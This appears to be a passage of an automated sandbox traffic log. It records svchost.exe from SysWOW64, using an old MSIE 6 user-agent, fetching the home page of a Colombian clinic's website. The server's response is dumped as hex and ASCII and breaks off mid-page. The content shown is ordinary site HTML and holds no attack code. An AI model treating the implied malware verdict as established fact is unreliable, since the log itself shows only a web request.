                                                                                                                                                                                                                                                  31192.168.2.421227104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:32 UTC5739OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5740INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:33 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Set-Cookie: d55e479f054c94814cbc10d217aaa990=e405c24eaabcb0fc1b3898629ad1e292; path=/; HttpOnly
                                                                                                                                                                                                                                                  Last-Modified: Thu, 27 Jul 2023 19:54:33 GMT
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1q67Cb6bNxy8HU5%2FGIXVYjMU7Ev5LeZbCPTPa%2BY%2BEP4L0DvWGmwAYORf8OJEsT9gqxNneWOuQUo%2FPqDeumJb1B4rDAHTKiNoTA9vQ0BAqhXKcjL%2BRId2W36ZBjc67EFhkBY21gNpz7g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76f54898d2c33-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5741INData Raw: 37 63 34 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                  Data Ascii: 7c4c<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5742INData Raw: 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65
                                                                                                                                                                                                                                                  Data Ascii: /rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/engine
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5743INData Raw: 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65
                                                                                                                                                                                                                                                  Data Ascii: s?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/syste
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5744INData Raw: 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e
                                                                                                                                                                                                                                                  Data Ascii: v.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><lin
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5746INData Raw: 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d
                                                                                                                                                                                                                                                  Data Ascii: tal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5747INData Raw: 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: ="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content">
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5748INData Raw: 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5750INData Raw: 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f
                                                                                                                                                                                                                                                  Data Ascii: iticas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5751INData Raw: 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61
                                                                                                                                                                                                                                                  Data Ascii: href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fa
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5752INData Raw: 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69
                                                                                                                                                                                                                                                  Data Ascii: enu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educaci
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5754INData Raw: 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                  Data Ascii: enu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-it
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5755INData Raw: 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                  Data Ascii: n class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class=
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5756INData Raw: 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c
                                                                                                                                                                                                                                                  Data Ascii: class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div><
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5758INData Raw: 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d
                                                                                                                                                                                                                                                  Data Ascii: </div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5759INData Raw: 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09
                                                                                                                                                                                                                                                  Data Ascii: c, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5760INData Raw: 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e
                                                                                                                                                                                                                                                  Data Ascii: lay = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/n
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5762INData Raw: 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b
                                                                                                                                                                                                                                                  Data Ascii: lock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock
